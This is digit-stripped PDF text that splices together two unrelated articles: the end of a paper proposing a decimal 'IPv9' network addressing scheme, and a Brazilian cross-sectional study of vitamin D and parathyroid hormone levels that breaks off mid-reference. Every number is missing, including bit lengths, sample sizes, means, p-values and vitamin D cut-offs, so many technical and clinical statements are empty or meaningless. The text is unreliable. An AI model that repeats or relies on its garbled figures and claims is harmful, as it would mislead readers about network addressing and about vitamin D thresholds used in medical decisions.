the transition to full decimal can be allocated at the same time decimal. in order to improve the software and hardware in the future without the need to reallocate addresses, such as [ ] can be written as [ ] . . . in the region in an ip network can be directly written with . . . , so that the original terminal can be used.there should be new records in the ipv dns records for compatibility between the original user and the current user.the interim ipv address system can be modified to the original ipv system.meanwhile, the ipv header is used, but the version number is to distinguish the original ipv .however, the original terminal equipment may be used by user terminals in the territory. when the address length is bits when the class number is , the ipv physical address is discarded and the ipv host -bit address is used. the representation is decimal or dot decimal - . - as in hexadecimal ff.ff. when the class number is , the address length is bits, represented by decimal - and the corresponding character length or dot decimal - . - . - . - . - as in hexadecimal ff.ff.ff.ff when the class number is , the address length is bits, represented by decimal or the corresponding character length. when the class number is , the address length is bits, represented by decimal or the corresponding character length. when the class number is , the address length is bits, represented by decimal or the corresponding character length. when the class number is , the address length is bits, denoted by decimal or the corresponding character length. when the class number is , the address length is bits, denoted by decimal or the corresponding character length. when the category number is , the address length is bits, represented by decimal or the corresponding character length. when the class number is , the address length is an unfixed bit, represented by the corresponding decimal length or the corresponding character length. v. allocation of address pace specific types of ipv addresses are identified by the high boot bit field in the address. the length of these boot bit fields varies. in the protocol, they are called the format prefix fp. international journal of advanced network, monitoring and controls volume , no. , table ii. ipv address format prefix format prefix fp (n bits) address ( -n bits) table iii. ipv address format prefix format prefix fp (n bits) address ( -n bits) the following is an overview of the various address type prefixes. table iv. ipv address format prefix for the original allocation table address type format prefix (binary code) format prefix (decimal code range) proportion of address space reserved address —— / unassigned address —— / ipv decimal network working group —— / ipx reserved address —— / unassigned address segment —— / unassigned address segment —— / unassigned address segment —— / unassigned address segment —— / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / aggregable global unicast address — / unassigned address segment - / unassigned address segment — / geographical area unicast address — / geographical area unicast address — / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / international journal of advanced network, monitoring and controls volume , no. , unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / local link unary address — / station single address — / multi-address — / full decimal address — — the aggregate global unary address and the cluster address belong to the unary address, they do not have any difference in form, only in the propagation mode of the message is different. therefore, the same format prefix is used for the polymerizable monocular and cluster address assignments. the proposed network vendor monocular addresses and geographic area monocular addresses are merged into a polymerizable monocular address. both the local link unary address and the station unary address are used in the local scope. in order to facilitate the router to speed up the identification of these two kinds of addresses, two address format prefixes, and , were assigned to them respectively. because the processing method of multi-destination address on the router and host is quite different from the processing method of single-destination address and cluster address, an address format prefix was also assigned to the multi-destination address. the design also reserved address space for "decimal internet address and domain name decision and allocation organization" and ipx address. the corresponding address format prefix is and .some special addresses of ipv , such as unspecified addresses, local return addresses and ipv -compatible addresses, are prefixed by as the address format. due to the length of this article, only the address format in the ipv address architecture is described in detail. for more knowledge of ipv , please refer to the related articles. vi. the conclusion ipv is the core and key technology of the next generation internet. in this paper, ipv address coding is researched and a new address coding is proposed.ipv increases the length of ip addresses from bits and bits to bits, and the default is bits, to support more address hierarchies, more addressable nodes, and simpler automatic address configurations. in order to reduce the network overhead, the fixed location method is adopted, international journal of advanced network, monitoring and controls volume , no. , changed the encoding of header options to allow more efficient forwarding. reduce restrictions on option length for greater flexibility in introducing new options in the future. ipv adds expansionary support for ip address encryption and authentication, data integrity, and data privacy (optional). the new network address is not only the update and upgrade of the old network address, but also a brand new internet system structure, which has laid a solid foundation for promoting the extensive application and integrated development of internet and internet of things. introduction of xie jianping xie jianping, male, was born in shanghai, china in . he is a chinese expert in the international standards organization (iso/iec jtc /so ). as the "decimal network standard working group" and "electronic labeling standard working group data format group" of the ministry of industry and information technology of the people's republic of china, the "new generation security controllable information network technology platform overall design" expert group and the internet of things joint standards working group leader of the team. it is also the main editor of the iso/c "future network naming and addressing" chinese member. professor xie has obtained more than multinational patents. the patents on network resources, terminal equipment, networks transmission and information platform include "methods for allocating addresses to computers using internet with full digital codes" and "methods for allocating computer addresses with all-decimal algorithms for networked computers", "method and apparatus for implementing trusted network connection through a router or switch", "method for uniformly compiling and allocating addresses of networked computers and intelligent terminals", "decimal gateway", "an ipv /ipv nat router", "an ipv website browser plugin", "a new generation of ipv routers", "a networked tax control system and its method" and "digital remote video surveillance system device" reference [ ] xie jianping etc. a method of ssigning addresses to network computers using the full decimal algorithm[p]. cn: zl . , . . . [ ] xie jianping etc. method of using whole digital code to assign address for computer [p]. us: , . . [ ] s. deering, r. hinden, network working group. internet protocol, version (ipv )-specification, rfc- , . . [ ] rfc – internet standard. internet protocol, darpa internet program protocol specification, rfc , . . [ ] p. srisuresh. network working group. ip network address translator (nat) terminology and considerations. rfc- , . . [ ] v. fuller. network working group. classless inter-domain routing (cidr):the internet address assignment and aggregation plan. rfc- , . . [ ] ross callon. tcp and udp with bigger addresses (tuba), a simple proposal for internet addressing and routing. rfc- , . . : – n neves marques de queiroz et al. vitamin d and pth: a cross-sectional study research vitamin d and pth: data from a cross-sectional study in an equatorial population natércia neves marques de queiroz, franciane trindade cunha de melo, fabrício de souza resende, luísa corrêa janaú, norberto jorge kzan de souza neto, manuela nascimento de lemos, ana carolina lobato virgolino, maria clara neres iunes de oliveira, angélica leite de alcântara, lorena vilhena de moraes, tiago franco david, wanderson maia da silva, scarlatt souza reis, márcia costa dos santos, ana carolina contente braga de souza, pedro paulo freire piani, neyla arroyo lara mourão, karem mileo felício, joão felício abrahão neto and joão soares felício university hospital joão de barros barreto, federal university of pará, endocrinology division, belem, pará, brazil correspondence should be addressed to j s felício: felicio.bel@terra.com.br abstract objective: investigate the prevalence of vitamin d deficiency in an equatorial population through a large-sample study. methods: cross-sectional study with , healthy individuals from the north region, in brazil (amazônia – state of pará), who had -hydroxy-vitamin d ( (oh)d) and intact parathyroid hormone (pth) serum levels measured by immunoassay method. those with history of acute or chronic diseases were excluded. abnormal levels of calcium, creatinine, glycemia and albumin were also exclusion criteria. results: (oh)d levels were .  ±  . ng/ml and values < . ng/ml were equal to < − s.d. below average. hypovitaminosis d was present in % of subjects according to the institute of medicine (values < ng/ml) and in %, in consonance with endocrine society (values – ng/ml as insufficiency and < ng/ml as deficiency) criteria. individuals were divided according to four age brackets: children, adolescents, adults and elderly, and their (oh)d levels were:  ±  ; .  ±  . ; .  ±  . ; .  ±  . ng/ml, respectively. all groups differed in (oh)d, except adolescents vs adults. regression model showed bmi, sex, living zone (urban or rural) and age as independent variables to (oh)d levels. comparing subjects with vitamin d deficiency (< ng/ml) to those with vitamin d insufficiency ( – ng/ml), a difference between pth levels in these two groups was observed ( .  ±  . pg/ml vs .  ±  . pg/ml; p <  . ). additionally, the most accurate predictive vitamin d level for subclinical hyperparathyroidism in roc curve was ng/ml. conclusion: our equatorial population showed low prevalence of vitamin d hypovitaminosis ranging with age bracket. the insufficient category by endocrine society was corroborated by our pth data. introduction the institute of medicine (iom) defines normality of vitamin d as serum -hydroxy-vitamin d ( (oh)d) levels above ng/ml, based on the dietary intake needed to meet the requirements for at least . % of the population ( ). according to this criterion, several studies worldwide have shown high rates of hypovitaminosis d, with an estimate of – %, in european, asian, african and south american countries ( , , ). therefore, hypovitaminosis d has been listed as a public health problem, as one billion people presented (oh)d - - key words f epidemiology f endocrinology f hypovitaminosis d f vitamin d endocrine connections ( ) , – id: - this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access mailto:felicio.bel@terra.com.br https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n neves marques de queiroz et al. vitamin d and pth: a cross-sectional study pb–xx : deficiency ( ), with a prevalence ranging from to %, depending on cut-off points and selected population ( ). in addition, manson et al. ( ), in , in a re-analysis of iom data, suggested there was an overestimation in the diagnosis of hypovitaminosis d and believed that sufficiency is reached when serum vitamin d is above . ng/ml. bouillon ( ), in a review, stated that all guidelines are unanimous in recommending avoidance of (oh)d levels below ng/ml, as well as highlighted the controversy involving levels between and ng/ml, which might not indicate deficiency necessarily for the whole population. besides the global controversy, large population studies trying to evaluate vitamin d levels in equatorial populations are rare. little data are available from a small number of locations such as kenya, dr congo and colombia ( , ). in brazil, few studies have been carried out to demonstrate the hypovitaminosis d prevalence in healthy subjects. therewithal, given the country’s length, there is considerable climatic difference between the regions and, as far as we are aware, there is no previous study in the amazonian region. therefore, it remains unclear whether the current diagnostic criterion for vitamin d deficiency might cause overdiagnosis of this condition. in this context, investigating the prevalence of vitamin d deficiency in an equatorial population, such as ours, through a large-sample study becomes meaningfully important. method study design and data collection a cross-sectional study was performed to evaluate serum levels of (oh)d, intact pth and ionized calcium. all our subjects lived in the state of pará (coordinates: . °s . °w), located in the north region of brazil (fig. ). being near the equator, pará constantly experiences hot climate and humid weather with little seasonal variation, as do most equatorial areas, which is the reason we did not include seasonality in this study ( ). usual uv index throughout the year ranges from to , being classified as ‘very high’, based on world health organization (who) criteria ( , ). total mean insolation is . h/year and total mean irradiation is . kwh/m day ( , ). data were collected from january to december . a total of , subjects of both sexes and different age groups who had (oh)d serum levels measured at a local laboratory service from january to december of were included in the study. all subjects answered a questionnaire; those with previous history of acute or chronic diseases (hypertension, chronic kidney failure, chronic liver disease, autoimmune diseases) were excluded, as well as pregnant women and those taking any medications, including patients who supplemented vitamin d. subjects who presented abnormal results of serum ionized calcium, creatinine, glycemia and serum albumin were also not eligible (reference values: . – . mmol/l, . – . mg/dl (men) and . – . mg/dl (women), . – . g/dl, respectively). individuals who had both vitamin d and pth collected were divided into a smaller group of healthy individuals and were analyzed separately, in order to properly interpret their data. information regarding age, sex, bmi and living zone were collected. patients were divided according to the age groups defined by who, in , as children ( – years old), teenagers ( – years old), adults ( – years old) and elderly (above years old). the impact of seasonality was not evaluated because there are not established patterns of seasons in our region ( , ). this study was approved by university hospital joão de barros barreto ethics committee, caae number . . . . assay individuals’ blood was collected and, then, serum (oh)d was measured quantitatively by the following kit: diasorin liaison -oh-vitamin d total figure  state of pará (north region, brazil). this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n neves marques de queiroz et al. vitamin d and pth: a cross-sectional study : chemiluminescence immunoassay (diasorin, stillwater, mn, usa) ( ). diasorin liaison is one of the methods to evaluate (oh)d tested by deqas (vitamin d external quality assessment scheme), the largest specialist external quality assessment (proficiency testing) scheme for the vitamin d metabolites (oh)d and , (oh) d, thus reinforcing the accuracy of our analysis ( ). quantitative serum intact parathyroid hormone (pth) was determined by electrochemiluminescence (modular analytics, e , roche). serum albumin was assessed by enzymatic methodology. concentration of plasmatic glucose was determined by the hexokinase method. creatinine was measured through kinetic alkaline picrate assays. ionized calcium was calculated based on total calcium, protein and albumin. statistical analysis vitamin d was tested for its normal distribution through the kolmogorov–smirnov test. the mean and the s.d. of (oh)d levels were calculated. to establish correlations between (oh)d levels and variables such as sex, age, bmi and living zone (urban or rural), pearson or spearman tests were used. stepwise multiple regression analysis and simple linear regression were also performed to evaluate the degree of influence of other variables in serum (oh)d levels. the spss statistics ® (ibm corp.) and rstudio ide (rstudio, inc.) software were used for quantitative statistical analysis. the p value < . was considered statistically significant. as for the subjects dosed for intact pth, a receiver operating characteristic (roc) curve was constructed to determine the most accurate vitamin d level to predict subclinical hyperparathyroidism (sht). the cut-off point with maximum sensitivity and specificity in the roc curve was defined as the minimum value in the equation (( − sensitivity) + ( − specificity)) and the precision was estimated based on the area under the roc curve. results in our study, , individuals of both sexes and different age groups were analyzed. the age of the subjects was . ± . years, ranging from to ( ± . in females vs ± . in males, p < . ) and bmi was . ± . kg/m . regarding sex, , ( %) were female and ( %) were male. they were divided into four age groups: children ( – years old), adolescents ( – ), adults ( – ) and elderly (≥ ). in our study, there were ( . %) children, ( . %) adolescents, , ( . %) adults and ( . %) elderly. (oh) d levels were . ± . ng/ml and values < . ng/ml were equal to < − s.d. below average. all groups differed in age and bmi, as shown in table . regarding the distribution of vitamin d levels according to each age bracket in our population, all groups differed between one another, except adolescents vs adults (fig. and table ). furthermore, regarding sex, (oh)d levels were higher in males in all groups (table ). only subjects ( %) were below − s.d. the median ( th– th percentile) was . ng/ml ( . – . ). hypovitaminosis d was present in % ( ) of subjects according to the institute of medicine (in which abnormal values are those < ng/ml) and in % ( , ), in consonance with endocrine society (which defines values between and ng/ml as insufficiency and values < ng/ml as deficiency) criteria. the prevalence of hypovitaminosis d around the world and in our population (according to age groups) is summarized in tables and . the subjects were from different cities in the state of pará and those living in urban areas showed lower (oh)d levels when compared to those living in rural areas ( . vs . ng/ml, p < . ). the levels of (oh)d correlated with bmi (r = − . ; p < . ) and age (r = − . ; p < . ). our forward stepwise regression model showed bmi, sex, living zone and age as independent variables to (oh)d levels (b = − . (ci: − . to − . ), r = . , p < . ; b = . (ci: . – . ), r = . , p < . ; b = − . (ci: − . to − . ), r = . , p < . ; b = . (ci: . – . ), table  clinical and laboratory characteristics according to age groups. children adolescents adults elderly pn= n= n= , n= age (years) .  ±  .  ±  . .  ±  . .  ±  . < . a sex (f/m) (%) / / / / < . a (oh)d (ng/ml)  ±  .  ±  . .  ±  . .  ±  . < . b bmi (kg/m )  ±  . .  ±  . .  ±  . .  ±  . < . a ap <  . between all groups. bp <  . between all age groups except adults vs adolescents (p =  . ). this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n neves marques de queiroz et al. vitamin d and pth: a cross-sectional study pb–xx : r = . , p < . ). these variables showed a poor prediction power, altogether being capable of determining only . % of (oh)d levels. an inclination coefficient of − . was obtained using bmi and vitamin d level as variables in a simple linear regression model according to the formula vitamin d level = . − ( . × bmi), which suggests that, for each bmi unit gained, there would be a decrease of . ng/ml in vitamin d levels. the subjects who had pth analyzed were divided into two subgroups according to (oh)d levels: subgroup (< ng/ml) and subgroup ( – ng/ml). a difference between pth levels in these two groups was observed ( . ± . pg/ml vs . ± . pg/ml; p < . ). the proportion of individuals with abnormal pth, in subjects with vitamin d deficiency or insufficiency according to endocrine society, is presented in fig. . in addition, the percentage of functional hypoparathyroidism (hypovitaminosis d with normal pth levels) among patients with vitamin d insufficiency ( – ng/ml) and deficiency (< ng/ml) was . % and . %, respectively (p < . ). according to the roc curve, the vitamin d value established as the cut-off point for pth response to vitamin d insufficiency and, in consequence, for increased risk of bone loss, in our sample was ng/ml, with sensitivity of . %, specificity of . % and accuracy of . %. the roc curve also presented accuracy of . %, positive likelihood ratio of . and negative likelihood ratio of . . in addition, we found that in ( %) of our individuals who had pth analyzed showed subclinical hyperparathyroidism. discussion our study showed low prevalence of hypovitaminosis d, ranging with age bracket, when compared to other countries, according to both iom and endocrine society (es) criteria, even when compared to other equatorial populations. in addition, the insufficient category by es was corroborated by our pth data. currently, due to laboratory assays and the variability of their cut-off points, (oh)d levels above ng/ml are accepted as appropriate by endocrine society, once this value would ensure a satisfactory action with no toxicity risk. in , es defined values between and ng/ml as insufficiency and values < ng/ml as deficiency ( ). iom, based on the dietary intake needed to meet the requirements of the population, established vitamin d deficiency as levels < ng/ml ( , ). they also suggest that each population should establish their specific criteria to decide about (oh)d supplementation. nevertheless, manson et al. ( ), while assessing data from the national health and nutrition examination survey (nhanes), suggested < . ng/ml as a cut-off. if manson’s proposition were used in our population, prevalence of vitamin d hypovitaminosis would be extremely low compared to other countries in the equatorial zone ( , ). therefore, it could indicate that specific population factors, such as latitude and mean insolation, might be of great importance to determine serum levels of (oh)d. in brazil, few population studies address this aspect. unger ( ) performed a transversal study in são paulo, evaluating volunteers aged – years in . the author found that . % of the participants showed vitamin d insufficiency and . % showed (oh)d deficiency. scalco et  al., in a research with noninstitutionalized seniors, found that the prevalence of vitamin d hypovitaminosis was higher ( . %) ( ). finally, linhares et al. studying children at recife, figure  (oh)d distribution according to age bracket. table   (oh)d levels (ng/ml) according to sex, separated into age groups. age/sex n male female p general , .  ±  . .  ±  . < . children  ±  .  ±  . < . adolescents .  ±  .  ±  . < . adults , .  ±  . .  ±  . < . elderly .  ±  . .  ±  . < . this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n neves marques de queiroz et al. vitamin d and pth: a cross-sectional study : brazil, did not find cases of vitamin d deficiency ( ). all those studies used endocrine society parameters of normality. the first two studies occurred in the south-southeast region of brazil ( °– ° s), with lower mean insolation, which could justify the higher hypovitaminosis d prevalence compared to our data. the third study, which evaluated just a selected children population, found no case of hypovitaminosis d and occurred in the northeast region of brazil, in a city with latitude close to ours. those last findings suggest that latitude, mean insolation and age must be considered when establishing normal vitamin d values in a population, which reinforces our findings about age bracket influence on vitamin d. in addition, we found higher levels of (oh)d in males. one possible explanation would be a greater sun exposure of the thorax – which is a region of better absorption of (oh)d. our results are in agreement with the findings of al-ghamdi ( ) and kiani et  al. ( ). the former evaluated subjects from saudi arabia and observed vitamin d lower in girls, probably because of their dressing costumes. in amazonia, due to the hot weather, men usually dress shirtless and, consequently, have a higher thorax exposure. another hypothesis would be the influence of testosterone levels. it has been suggested that testosterone levels could be associated with higher (oh)d levels ( , , , ). in fact, araujo et  al. also described vitamin d levels higher in males than in females, also suggesting this hormonal influence ( ). a possible mechanism that could explain this association is not well established. our data also showed a decrease in circulating concentrations of serum (oh)d while bmi increased, which indicates that poor vitamin d levels are linked with higher bmi. the proposed mechanisms to explain this include a lack of sun exposure, modified vitamin d table  prevalence of (oh)d deficiency in different countries. reference country n age range prevalence < ng/ml (munns et al. ( )) prevalence < ng/ml (iom) prevalence < ng/ml (es) queiroz et al. ( ) north brazil , – . % . % % mogire et al. ( ) africa countries , – . % . % . % cashman et al. ( ) europe , – % . % – eloi et al. ( ) southeast brazil (são paulo) , – – . % . % kiani et al. ( ) pakistan . – – – . % ramnemark et al. ( ) northern sweden – – . % – gill et al. ( ) northeast australia – – . % – unger et al. ( ) southeast brazil (são paulo) – – – % es, endocrine society; iom, institute of medicine. table  prevalence of vitamin d deficiency in our population according to different criteria. vitamin d cut-offs (ng/ml) < (munns et al. ( )) < (iom) < (es) children (%) n= . . . adolescents (%) n= . . . adults (%) n= , . . . elderly (%) n= . . . total (%) n= , . . . figure  distribution of patients with secondary hyperparathyroidism according to vitamin d status (endocrine society). this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n neves marques de queiroz et al. vitamin d and pth: a cross-sectional study pb–xx : activation and increased vitamin d storage in adipose tissue ( , , ). indeed, obese individuals expose themselves less to solar uv radiation, diminishing cutaneous synthesis of vitamin d from -dehydrocholesterol ( ). it was showed, in a study with obese patients, a higher prevalence of hypovitaminosis in this group, as none of them had the habit of sunbathing. their clothes used to cover as much skin as possible, generating the hypothesis that low concentrations of vitamin d may be related to low sun exposure in those patients ( ). eloi et al. ( ), in a similar research in são paulo, based on the es, performed an investigation in patients aged from to years, and observed vitamin d concentrations < ng/ml in . % of the patients, presenting higher vitamin d levels in summer ( . %) when compared to winter ( . %). in our study, it was not possible to assess this issue, due to the lack of proper season distinction in the state of pará, which is situated near the equator line presenting higher insolation throughout the year. our study showed that people living in rural areas have higher vitamin d levels. this finding agrees with a meta-analysis that took place in african countries recently ( ). however, it remains a controversial topic. fang et al. ( ), in a study based in china, with subjects, showed slightly higher vitamin d levels among urban residents compared to rural ones, but also pointed out that its results are opposed to many similar researches in asia ( , , , ). similarly, an indian study demonstrated lower (oh)d levels in rural subjects despite plentiful sun exposure ( ). in our region, the dressing habits of countryside inhabitants, such as using lighter and fewer clothes, and the fact that rural areas have less impairment of sun exposure due to shorter buildings could influence our results. in fact, kimli et  al. ( ) established skin exposure as the single strongest contributor to the explained variance in (oh)d. however, this issue needs to be better analyzed. the variables studied in our regression model showed a low predictive power, being capable of determining only . % of (oh)d levels. an important hypothesis that could explain these findings is the assessment of polymorphism consequences for the vitamin d receptor (vdr) function. this individual genetic diversity could play a central role in determining (oh)d levels ( , , , ). according to nissen ( ), who analyzed twenty- five different genetic variants in seven different genes, it was concluded that polymorphisms in the cyp r and gc genes are associated with serum variations in the vitamin d. in this same perspective, husain et al. ( ), who compared americans with european and african ancestry with similar lifestyles and demographic conditions, demonstrated that those with african ancestry had lower (oh)d values. both studies suggest that specific ethnic and genetic determinants may influence vitamin d levels. in brazil, the expressive miscegenation makes ethnic analysis difficult. this could explain the difference between hypovitaminosis d prevalence in our study when compared to those from the rest of the world. analyzing the roc curve in this study, we found that vitamin d level of ng/ml is the best cut-off point for the pth response to vitamin d insufficiency and, consequently, for increased risk of bone loss. it suggests that subjects with vitamin d levels lower than ng/ml could have an additional benefit in supplementation, since a large number of people who fit in this condition are asymptomatic to shp. according to es definitions, this value is classified as insufficiency, reinforcing that this group of individuals should receive special attention in clinical practice. another aspect that should be addressed is the method for assessing vitamin d. liquid chromatography– mass spectrometry is considered the gold standard for measuring (oh)d. it has the advantage of allowing sample adaptation and high specificity; however, it is a complex, expensive and rarely available assay ( ). the automated immunoassay is the most widely used method globally, standardized in clinical practice, as it is easier to perform, faster and less costly ( , ). in our study, aiming at the clinical applicability of the findings, the automated immunoassay was used. in brazil, low vitamin d intake is commonly observed. filgueiras et  al. ( ) found an elevated prevalence of inadequate vitamin d intake ( . %) among children. peters et al. ( ), studying adolescents, and cembranel et al. ( ), assessing patients between and years, described that . % and % of subjects did not meet the daily adequate intake recommendation of vitamin d. in , a national dietary survey with brazilian elderly stated that our region had more adequate levels of vitamin d intake when compared to other regions of brazil, even though inadequacy was still very present ( ). this might contribute to the lower prevalence of vitamin d hypovitaminosis in our population. skin pigmentation also might have an influence in vitamin d levels. libon et  al. ( ), in a research with fitzpatrick skin types ii, iii (fair-skinned) and vi (black- skinned) individuals, found that after a single total body uvb exposure fair-skinned people presented higher levels of vitamin d when compared to black-skinned people. in agreement, a systematic review conducted by this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n neves marques de queiroz et al. vitamin d and pth: a cross-sectional study : xiang et al. ( ) concludes that vitamin d production was less effective in those with pigmented skin. in the north region of brazil, black people correspond solely to . % of the population ( ). this also might have influenced our results. in fact, as a limitation of our study, we did not consider the amount of time of exposure to sunlight, skin type and vitamin d daily dietary intake, which are known as important factors impacting serum vitamin d levels. finally, the low prevalence of hypovitaminosis d in our population was established by iom criteria of ng/ml, using data from our , subjects who performed (oh)d serum dosage. on the other hand, the value of ng/ml resulted from a roc curve constructed to determine the most accurate vitamin d level to predict subclinical hyperparathyroidism, which should be considered for treatment in risk groups for bone mass loss, for example. however, it would not be a general population cut-off point. conclusion our equatorial population showed low prevalence of vitamin d hypovitaminosis, according to both iom (< ng/ml) and es criteria (< ng/ml), ranging with age bracket. the insufficient category by endocrine society was corroborated by our pth data. since our regression model could only determine . % of the vitamin d levels, the individual characteristics of each subject should be taken into account to establish inadequate levels of vitamin d. declaration of interest the authors declare that there is no conflict of interest that could be perceived as prejudicing the impartiality of the research reported. funding this work did not receive any specific grant from any funding agency in the public, commercial, or not-for-profit sector. ethics approval and consent to participate our study was approved by the human research ethics committee. the committee waived the requirement for written informed consent for participants in this study in accordance with the national legislation, resolution / (national health council) and the institutional requirements due to the fact that it is a database population study with confidentiality and non-identification guarantee. consent for publication all authors approved the manuscript and consent to this submission. availability of data and material the datasets analyzed during the current study are available from the corresponding author on reasonable request. author contribution statement all persons who meet authorship criteria are listed as authors, and all authors certify that they have participated sufficiently in the work to take public responsibility for the content, including participation in the concept, design, analysis, writing, or revision of the manuscript. k m f, j s f and n n m q took part in conception and design of study. a l a, l v m, t f d, n a l m, w m s and a c c b s were responsible for acquisition of data, while l c j, j s f, s s r, n j k s n, p p f p and j f a n have done the analysis and interpretation of data. m n l, a c l v, f t c m, f s r, l m c f and m c n i o have drafted the manuscript together. all authors have revised the manuscript critically and approved the version to be published. acknowledgements the authors thank amaral costa laboratory and programa de pós graduação em oncologia e ciências médicas of hujbb for their contribution to the research. references maeda ss, borba vzc, camargo mbr, silva dmw, borges jlc, bandeira f, lazaretti-castro m & brazilian society of endocrinology and metabology (sbem). recommendations of the brazilian society of endocrinology and metabology (sbem) for the diagnosis and treatment of hypovitaminosis d. arquivos brasileiros de endocrinologia e metabologia – . (https://doi.org/ . / - ) mogire rm, mutua a, kimita w, kamau a, bejon p, pettifor jm, adeyemo a, williams tn & atkinson sh. prevalence of vitamin d deficiency in africa: a systematic review and meta-analysis. lancet: global health e –e . (https://doi.org/ . /s - x( ) - ) cashman kd, dowling kg, Škrabáková z, gonzalez-gross m, valtueña j, de henauw s, moreno l, damsgaard ct, michaelsen kf, mølgaard c, et al. vitamin d deficiency in europe: pandemic? american journal of clinical nutrition – . (https:// doi.org/ . /ajcn. . ) holick mf. the vitamin d deficiency pandemic: approaches for diagnosis, treatment and prevention. reviews in endocrine and metabolic disorders – . (https://doi.org/ . / s - - - ) hilger j, friedel a, herr r, rausch t, roos f, wahl da, pierroz dd, weber p & hoffmann k. a systematic review of vitamin d status in populations worldwide. british journal of nutrition – . (https://doi.org/ . /s ) manson je, brannon pm, rosen cj & taylor cl. vitamin d deficiency – is there really a pandemic? new england journal of medicine – . (https://doi.org/ . / nejmp ) bouillon r. comparative analysis of nutritional guidelines for vitamin d. nature reviews: endocrinology – . (https:// doi.org/ . /nrendo. . ) hernando vu, andry mm, maría virginia pf & valentina a. vitamin d nutritional status in the adult population in colombia – an analytical cross-sectional study. heliyon e . (https://doi. org/ . /j.heliyon. .e ) national geographic. equator. washington, dc, usa: national geographic. (available at: https://www.nationalgeographic.org/ encyclopedia/equator/) this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . / - https://doi.org/ . /s - x( ) - https://doi.org/ . /s - x( ) - https://doi.org/ . /ajcn. . https://doi.org/ . /ajcn. . https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /s https://doi.org/ . /nejmp https://doi.org/ . /nejmp https://doi.org/ . /nrendo. . https://doi.org/ . /nrendo. . https://doi.org/ . /j.heliyon. .e https://doi.org/ . /j.heliyon. .e https://www.nationalgeographic.org/encyclopedia/equator/ https://www.nationalgeographic.org/encyclopedia/equator/ https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n neves marques de queiroz et al. vitamin d and pth: a cross-sectional study pb–xx : nasa earth observations. uv index. greenbelt, md, usa: neo. (available at: https://neo.sci.gsfc.nasa.gov/view. php?datasetid=aura_uvi_clim_m) world health organization. ultraviolet (uv) index. geneva switzerland: who, . (available at: https://www.who.int/news- room/q-a-detail/ultraviolet-(uv)-index) national institute of meteorology. meteorological database for teaching and research. brasília, brasil: inmet. (available at: http:// www.inmet.gov.br/portal/index.php?r=bdmep/bdmep) national space research institute. solar and terrestrial radiation. são josé dos campos, brazil: dsa. (available at: http://satelite.cptec. inpe.br/radiacao/) machado lat, laurent h, dessay n & miranda i. seasonal and diurnal variability of convection over the amazonia: a comparison of different vegetation types and large scale forcing. theoretical and applied climatology – . (https://doi.org/ . /s - - - ) nobre ca, obregón go, marengo ja, fu r & poveda g. characteristics of amazonian climate: main features. in geophysical monograph series, – . eds m keller, m bustamante, j gash & ps dias. washington, dc, usa: american geophysical union, . (https://doi.org/ . / gm ). diasorin. liaison oh vitamin d total assay [brochure]. stillwater, mn, usa: diasorin. (available at: https://www.diasorin. com/en/node/ ) deqas. vitamin d external quality assessment scheme. deqas review / . london, uk: deqas. (available at: http://www. deqas.org/downloads/deqas% review% october% .pdf) holick mf, binkley nc, bischoff-ferrari ha, gordon cm, hanley da, heaney rp, murad mh, weaver cm & endocrine society. evaluation, treatment, and prevention of vitamin d deficiency: an endocrine society clinical practice guideline. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) institute of medicine (iom). dietary reference intakes for calcium and vitamin d. pediatrics e . (https://doi.org/ . / peds. - ) ross ac, manson je, abrams sa, aloia jf, brannon pm, clinton sk, durazo-arvizu ra, gallagher jc, gallo rl, jones g, et al. the report on dietary reference intakes for calcium and vitamin d from the institute of medicine: what clinicians need to know. journal of clinical endocrinology and metabolism – . (https://doi. org/ . /jc. - ). unger md. determinação dos níveis séricos de vitamina d em uma amostra de indivíduos saudáveis da população brasileira. são paulo. doctoral dissertation (science doctorate), the faculty of medicine of the univeristy of são paulo, . scalco r, premaor mo, fröehlich pe & furlanetto tw. high prevalence 